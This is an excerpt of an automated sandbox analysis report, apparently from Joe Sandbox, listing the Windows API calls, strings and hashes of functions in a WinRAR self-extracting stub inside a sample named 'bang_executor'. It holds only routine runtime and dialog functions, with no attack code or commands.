                                        • _free.LIBCMT ref: 0050EF42
                                          • Part of subcall function 0050BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?), ref: 0050BB10
                                          • Part of subcall function 0050BAFA: GetLastError.KERNEL32(?,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?,?), ref: 0050BB22
                                        • _free.LIBCMT ref: 0050EF4D
                                        • _free.LIBCMT ref: 0050EF58
                                        • _free.LIBCMT ref: 0050EFAC
                                        • _free.LIBCMT ref: 0050EFB7
                                        • _free.LIBCMT ref: 0050EFC2
                                        • _free.LIBCMT ref: 0050EFCD
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        Uniqueness
                                        • Uniqueness Score: -1.00%
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000020,?), ref: 004E8CB2
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004E8CB9
                                        • GetLastError.KERNEL32 ref: 004E8CF6
                                        • CloseHandle.KERNEL32(?), ref: 004E8D05
                                        Strings
                                        Similarity
                                        • API ID: Process$CloseCurrentErrorHandleLastOpenToken
                                        • String ID: JP$^P
                                        • API String ID: 2767541406-2446375460
                                        Uniqueness
                                        • Uniqueness Score: -1.00%
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00500B46,00500AA9,00500D4A), ref: 00500AE2
                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00500AF8
                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00500B0D
                                        Strings
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                        • API String ID: 667068680-1718035505
                                        Uniqueness
                                        • Uniqueness Score: -1.00%
                                        APIs
                                        • _wcslen.LIBCMT ref: 004F4192
                                        • _wcslen.LIBCMT ref: 004F41A3
                                        • _wcslen.LIBCMT ref: 004F41B3
                                        • _wcslen.LIBCMT ref: 004F41C1
                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,004ED2D3,?,?,00000000,?,?,?), ref: 004F41DC
                                        Strings
                                        Similarity
                                        • API ID: _wcslen$CompareString
                                        • String ID: <
                                        • API String ID: 3397213944-4251816714
                                        Uniqueness
                                        • Uniqueness Score: -1.00%
                                        APIs
                                        • _free.LIBCMT ref: 0050B17E
                                          • Part of subcall function 0050BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?), ref: 0050BB10
                                          • Part of subcall function 0050BAFA: GetLastError.KERNEL32(?,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?,?), ref: 0050BB22
                                        • _free.LIBCMT ref: 0050B190
                                        • _free.LIBCMT ref: 0050B1A3
                                        • _free.LIBCMT ref: 0050B1B4
                                        • _free.LIBCMT ref: 0050B1C5
                                        Strings
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID: p,R
                                        • API String ID: 776569668-400878132
                                        Uniqueness
                                        • Uniqueness Score: -1.00%
                                        APIs
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 004F35E6
                                          • Part of subcall function 004ED076: GetVersionExW.KERNEL32(?), ref: 004ED0A7
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004F360A
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 004F3624
                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 004F3637
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004F3647
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004F3657
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion
                                        • String ID:
                                        • API String ID: 2092733347-0
                                        • Opcode ID: 92ef35d3f84ed5deac5f81f9118402824387d81bf40410e4ebea4b4488335036
                                        • Instruction ID: 265f2e066db84cc85886b922e93b0438bb1432c5d708030ce8a126205d0cc887
                                        • Opcode Fuzzy Hash: 92ef35d3f84ed5deac5f81f9118402824387d81bf40410e4ebea4b4488335036
                                        • Instruction Fuzzy Hash: BD411C76108345ABCB04DFA8C8849ABB7E8FF98704F04891EF995C7210E734D909CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLastError.KERNEL32(?,?,00505111,00504ECC,005021B4), ref: 00505128
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00505136
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0050514F
                                        • SetLastError.KERNEL32(00000000,00505111,00504ECC,005021B4), ref: 005051A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 976ff20184d33338b49741b86467a40b62603a701d88faf052de3c062a103a74
                                        • Instruction ID: 299e4ebcaa0829908590d3f3ce15a57930d19474712456b09a6c6e948c0750db
                                        • Opcode Fuzzy Hash: 976ff20184d33338b49741b86467a40b62603a701d88faf052de3c062a103a74
                                        • Instruction Fuzzy Hash: C701D43A10DB136EE62527B4BC8A76F2E54FFA2370B601329F110860E0FF514C65EA84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLastError.KERNEL32(?,005250C4,00506E12,005250C4,?,?,0050688D,?,?,005250C4), ref: 0050B9A9
                                        • _free.LIBCMT ref: 0050B9DC
                                        • _free.LIBCMT ref: 0050BA04
                                        • SetLastError.KERNEL32(00000000,?,005250C4), ref: 0050BA11
                                        • SetLastError.KERNEL32(00000000,?,005250C4), ref: 0050BA1D
                                        • _abort.LIBCMT ref: 0050BA23
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: 573a84b4a7313e6d7dc32470e06b26cd59bda3a3668e0e121ff10f18dbfe6bd1
                                        • Instruction ID: 5840ef56461c54e4f390a2eb7cdfadda2ef9264752d45369f9b5e855d9658604
                                        • Opcode Fuzzy Hash: 573a84b4a7313e6d7dc32470e06b26cd59bda3a3668e0e121ff10f18dbfe6bd1
                                        • Instruction Fuzzy Hash: 79F0F436248A0377E61573656C8EBAF2D39FFD1770F290824F615A22D2FF618C065020
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • EndDialog.USER32(?,00000001), ref: 004FD57B
                                        • GetDlgItemTextW.USER32(?,00000066,00001000,00000200), ref: 004FD591
                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 004FD5B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ItemText$Dialog
                                        • String ID: GETPASSWORD1$Software\WinRAR SFX
                                        • API String ID: 1770891597-1315819833
                                        • Opcode ID: 480b39f3b2b0d99d054358acc901641b5081b9bbb261782c5842035180ada9f6
                                        • Instruction ID: 73cbac32c94fc547a41c453943c700293fccbfb9b58ef8c7e33bb048da361e1f
                                        • Opcode Fuzzy Hash: 480b39f3b2b0d99d054358acc901641b5081b9bbb261782c5842035180ada9f6
                                        • Instruction Fuzzy Hash: DD41C27290420DABEB30AB64CC49FFE77ADEF59304F10042AF709E3181DB74A9449B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004F2663: _wcslen.LIBCMT ref: 004F2669
                                          • Part of subcall function 004ED848: _wcsrchr.LIBVCRUNTIME ref: 004ED85F
                                        • _wcslen.LIBCMT ref: 004EE105
                                        • _wcslen.LIBCMT ref: 004EE14D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$_wcsrchr
                                        • String ID: .exe$.rar$.sfx
                                        • API String ID: 3513545583-31770016
                                        • Opcode ID: 894ec50b6ba220bd7cfd4028d6d3f6959daa6b93dc403d48d5c36f115979f914
                                        • Instruction ID: 55282c58386dee3fdcf522f743088581fdabb33258e5aa2bcabaa4965ebf600f
                                        • Opcode Fuzzy Hash: 894ec50b6ba220bd7cfd4028d6d3f6959daa6b93dc403d48d5c36f115979f914
                                        • Instruction Fuzzy Hash: 954126225007A1D5D7326F338856A7BB7A4EF4174AB104D0FFA85AB280E7A99DC1C35E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wcslen.LIBCMT ref: 004EDA59
                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,004EBD19,?,?,00000800,?,?,?,004EBCD4), ref: 004EDB02
                                        • _wcslen.LIBCMT ref: 004EDB70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$CurrentDirectory
                                        • String ID: UNC$\\?\
                                        • API String ID: 3341907918-253988292
                                        • Opcode ID: d67541bc472da77df9d715bf3d1094b5c7368379443e491b6913b380c675886d
                                        • Instruction ID: ea921a68298df3f5d1927972ed9b8ec05137f18a5b72b5f36764e7480b1200ad
                                        • Opcode Fuzzy Hash: d67541bc472da77df9d715bf3d1094b5c7368379443e491b6913b380c675886d
                                        • Instruction Fuzzy Hash: CD412431C043C16AD620AB228C81DFF77BCAF49745F01086FF584D3241E7ACAA85C66A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: %P
                                        • API String ID: 176396367-2070853540
                                        • Opcode ID: 31b487751cde02512edbd3c988f4c079efc5091408b5d5de52faf4413260be27
                                        • Instruction ID: 5298ae2476df1317f569f6aa5b18d2189c8c604ea1ec3d51a892fc4a5e35f708
                                        • Opcode Fuzzy Hash: 31b487751cde02512edbd3c988f4c079efc5091408b5d5de52faf4413260be27
                                        • Instruction Fuzzy Hash: 234184715047569BC725DF388D599AFBBE8FF89300F00091EFA89D3251DB34A9098B96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LoadBitmapW.USER32(00000065), ref: 004FD9ED
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 004FDA12
                                        • DeleteObject.GDI32(00000000), ref: 004FDA44
                                        • DeleteObject.GDI32(00000000), ref: 004FDA67
                                          • Part of subcall function 004FC652: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,004FDA3D,00000066), ref: 004FC665
                                          • Part of subcall function 004FC652: SizeofResource.KERNEL32(00000000,?,?,?,004FDA3D,00000066), ref: 004FC67C
                                          • Part of subcall function 004FC652: LoadResource.KERNEL32(00000000,?,?,?,004FDA3D,00000066), ref: 004FC693
                                          • Part of subcall function 004FC652: LockResource.KERNEL32(00000000,?,?,?,004FDA3D,00000066), ref: 004FC6A2
                                          • Part of subcall function 004FC652: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,004FDA3D,00000066), ref: 004FC6BD
                                          • Part of subcall function 004FC652: GlobalLock.KERNEL32(00000000,?,?,?,?,?,004FDA3D,00000066), ref: 004FC6CE
                                          • Part of subcall function 004FC652: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 004FC737
                                          • Part of subcall function 004FC652: GlobalUnlock.KERNEL32(00000000), ref: 004FC756
                                          • Part of subcall function 004FC652: GlobalFree.KERNEL32(00000000), ref: 004FC75D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                        • String ID: ]
                                        • API String ID: 1428510222-3352871620
                                        • Opcode ID: cd489251db8e54d9987b84d7c91ec639ef7ee0a111a5a522ae64b27d664a4fd3
                                        • Instruction ID: 1d9e0565a103d96a9e7e0b0fa2e03ff76f0a5776051a3f337e9666d5775c0970
                                        • Opcode Fuzzy Hash: cd489251db8e54d9987b84d7c91ec639ef7ee0a111a5a522ae64b27d664a4fd3
                                        • Instruction Fuzzy Hash: E0018936C0421D67C72177754C4DABF3A7A9F82719F040016FA08B7391DF388C099AAC
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004E1366: GetDlgItem.USER32(00000000,00003021), ref: 004E13AA
                                          • Part of subcall function 004E1366: SetWindowTextW.USER32(00000000,005165F4), ref: 004E13C0
                                        • EndDialog.USER32(?,00000001), ref: 004FF99B
                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 004FF9B1
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 004FF9C5
                                        • SetDlgItemTextW.USER32(?,00000068), ref: 004FF9D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: RENAMEDLG
                                        • API String ID: 445417207-3299779563
                                        • Opcode ID: 358d8e3ce480e6ab0fed1c3e6cf6cbd5d1e47b7a95b07b7a3dde32b13ba3175a
                                        • Instruction ID: 00fd5fc590264cac373cb4ff07e24f854f46f3e90af7deb2d901206b98cb612e
                                        • Opcode Fuzzy Hash: 358d8e3ce480e6ab0fed1c3e6cf6cbd5d1e47b7a95b07b7a3dde32b13ba3175a
                                        • Instruction Fuzzy Hash: A401F5722842187BE2214B649C49FBB775CFF6A706F104427F341A21A0C7AA9A0DD76A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0050A676,?,?,0050A616,?,0051F7B0,0000000C,0050A76D,?,00000002), ref: 0050A6E5
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0050A6F8
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0050A676,?,?,0050A616,?,0051F7B0,0000000C,0050A76D,?,00000002,00000000), ref: 0050A71B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 139ab3e5d87444a7b69041c9438c7d5c91ce8400c9396885504be8585def2456
                                        • Instruction ID: 09e1af6a96c8dcccc7d4973b979512fad69f58b1801041ec6566d612d57dcc3b
                                        • Opcode Fuzzy Hash: 139ab3e5d87444a7b69041c9438c7d5c91ce8400c9396885504be8585def2456
                                        • Instruction Fuzzy Hash: 4BF0AF30A00208BBDB109FA4DC49BEDBFB9FF08701F048168F80AA21A0CB305E84DB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004F0244: _swprintf.LIBCMT ref: 004F0284
                                          • Part of subcall function 004F0244: _strlen.LIBCMT ref: 004F02A5
                                          • Part of subcall function 004F0244: SetDlgItemTextW.USER32(?,00522274,?), ref: 004F02FE
                                          • Part of subcall function 004F0244: GetWindowRect.USER32(?,?), ref: 004F0334
                                          • Part of subcall function 004F0244: GetClientRect.USER32(?,?), ref: 004F0340
                                        • GetDlgItem.USER32(00000000,00003021), ref: 004E13AA
                                        • SetWindowTextW.USER32(00000000,005165F4), ref: 004E13C0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                        • String ID: 0$pPR$pPR
                                        • API String ID: 2622349952-1397670162
                                        • Opcode ID: 2e0bd967f4a0d156d4024dba353530120b3b1b78ff5a9e7033efc8f994bfbe95
                                        • Instruction ID: 6647a166621bb325d24c4b88a75020a820850f6e109fa8038daf7d3e74caf6a1
                                        • Opcode Fuzzy Hash: 2e0bd967f4a0d156d4024dba353530120b3b1b78ff5a9e7033efc8f994bfbe95
                                        • Instruction Fuzzy Hash: BAF0817018428CA6EF150F639C0DBFA3FA8AF15319F044255FD4591AA2DBBCC994EA68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004F28AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004F28D4
                                          • Part of subcall function 004F28AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004F1309,Crypt32.dll,00000000,004F1383,00000200,?,004F1366,00000000,00000000,?), ref: 004F28F4
                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004F1315
                                        • GetProcAddress.KERNEL32(0052C1F0,CryptUnprotectMemory), ref: 004F1325
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                        • API String ID: 2141747552-1753850145
                                        • Opcode ID: ae96ef5513db3bb01587adfbe940cc1459d00a0532577d489d9789a72cdf66a0
                                        • Instruction ID: 3776e5bba18301aabaa7b302fd55cc9579b2d75ac98d0a2b6627c7316b379c79
                                        • Opcode Fuzzy Hash: ae96ef5513db3bb01587adfbe940cc1459d00a0532577d489d9789a72cdf66a0
                                        • Instruction Fuzzy Hash: 0BE08670A41745AEF7206F34A909B927EE5AF28700F05C81EE5C993650D6B8D8808B10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
